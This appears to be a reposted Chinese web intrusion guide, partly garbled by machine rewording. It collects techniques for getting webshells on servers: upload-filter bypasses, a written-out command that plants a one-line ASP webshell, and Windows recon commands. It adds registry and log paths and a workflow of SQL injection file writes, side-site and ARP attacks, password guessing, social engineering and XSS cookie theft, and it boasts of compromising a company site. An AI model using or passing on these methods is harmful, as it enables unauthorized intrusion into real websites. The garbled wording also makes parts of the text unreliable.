WEB下渗透测试经验技术(全)[转发]

Nuclear’Atk 整理的:

上传漏洞拿shell:

1.一向上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,得到shell.
2.就是在上传时在后缀前面加空格或者加几点,也许也会有惊呆的觉察。例:*.asp
,*.asp..。
3.运用再次增添名上传例如:*.jpg.asa格式(也足以配上第二点一块行使)。
4.gif文书头欺骗
5.同名重复上传也很OK。:

入侵渗透中用到的授命,语法:

set,systeminfo,ipconfig,ping,利用这个命令可以接过比较多的系统音讯
tasklist /svc   查看 服务对应的pid
netstat -ano,netstat -abnv
fsutil.exe fsinfo drives  列出成套盘符
dir d:\*conn*.* /s     找数据库连接文件
telnet 218.25.88.234 3389    对外表是不是开放了那几个端口
echo  ^<%execute(request(“cmd”))%^> >>e:\k\X.asp  
写一句话到e:\k\目录,密码为cmd.
type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp  
传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感新闻:

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表地点
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机地方
HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters   
1433端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual
Roots\  服务器ftp路径

服务器日志文件物理路径:

平安日志文件:%systemroot%\system32\config \SecEvent.EVT
系统日志文件:%systemroot%\system32\config \SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
FTP连接日志和HTTPD事务日志:systemroot%
\system32\LogFiles\,下边还有子文件夹,分别对应当FTP和Web服务的日记,其对应的后缀名为.Log。
诺顿杀毒日志:C:\Documents and Settings\All Users\Application
Data\Symantec

oldjun 大牛写的入侵网站的经验:

上面谈谈个人侵袭的经验,不分语言,只谈拿webshell,至于提权,那里不说,我也很少提权,除非确实有必不可少!~

1.无论怎么样站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最终发现有个现成的上传点,而且很简单猜到,然而那种景色时有暴发在asp居多!

2.asp(aspx)+MSSQL先考虑注入,一般的流入都有DBowner权限可以平昔写shell;如若写不了,或者web与数据库分离,那就猜数据,从后台入手了,后台可以上传或者改配置文件;

3.asp(aspx)+ACCESS拿shell一般唯有3种办法,一是前台上传或者注入进后台上传;二是流入进后台改配置文件;三是流入进后台备份数据库或者暴库后精晓是asp或者asa数据库于是直接写一句话;

4.php+MYSQL一般是流入进后台上传,偶尔运气好些权限够高可以注入select into
outfile;然后包罗,分本地与远程,远程包蕴在高版本php是不支持的,于是想方法本地上传图片文件或者写到log里;然后php程序某某未公开的
漏洞,运气好能够一向写shell。

5.jsp+MYSQL拔取数据库拿权限方面着力同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell分外的简单。jsp+ORACLE的站我遇上的不多,遭受的也是猜出用户名与密码从后台出手的。

6.无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名出手,猜出主站的某些用户名与密码依然搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。

7.貌似的大站很少有用现成的CMS的,于是即使您好运找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都控制在你手里。多看看那一个大站新出来的测试分站点,那么些站还在测试中,可以很轻松砍下。

8.上传有个文本名截断,那蕴含2个方面,一是00截断,二是长文件名截断(曾经选用这么些搞下hw);然后众多写文件的地点,都得以00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都足以啊)目录的妙用。

9.php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在
server变量注入的时候仍是可以select into
outfile,二〇一九年自我搞过某未开源cms就是那些状态,一般景况下为on就别考虑写文件了,不过有其一权力别忘了读文件源码,因为load_file的
参数是可以编码的。

10.猜途径或者文件在入侵中丰硕要求,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robot.txt或者robots.txt,会有悲喜。

11.工具的利用很重大,侵略从前用WVS扫扫会有助入侵;注入工具就算很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。

12.相逢过一级监控么,遭逢任何防post的防火墙么,有时候一句话进去了都不可能传马来亚,这时候,你先学学编码,学学变换绕过。

13.想搞一般的小站,记得查看那一个小站的版权,找做那几个站的小卖部,然后从这一个公司做的其他站入手,获得源码再回头搞,我曾经通过那些措施砍下某老牌制药的营业所站。

14.旁注的笔触永远只是时,蒙受dbowner的注入,可以很清爽写shell到您要求的站,省得劳碌的提权了;运气不好,安份守己拿shell提权得到你所需。

15.世代别忘记社会工程学,利用社工把温馨正是一个怎么样也不会的人,从某某站长的qq,身份证,邮箱等等出手,也许有时可能会有意想不到;此外别忘记admin,admin;test,test;123456,123456那种简单的尝尝,当然,你也得以暴力破解。

16.别忽视XSS,别忽略cookie,XSS可以偷cookie,更有若干妙用,自己学会领会;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝半数以上的防火墙。

17.平常搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的纷扰步骤记录下来,或者未来反思下,我一般都是记在txt里,此外要已毕举一反三。

18.多就学,多看源码,多看公布出来的0day,脚本是侵略的前提,而不是工具,会用工具会装B你还没入门。

相关文章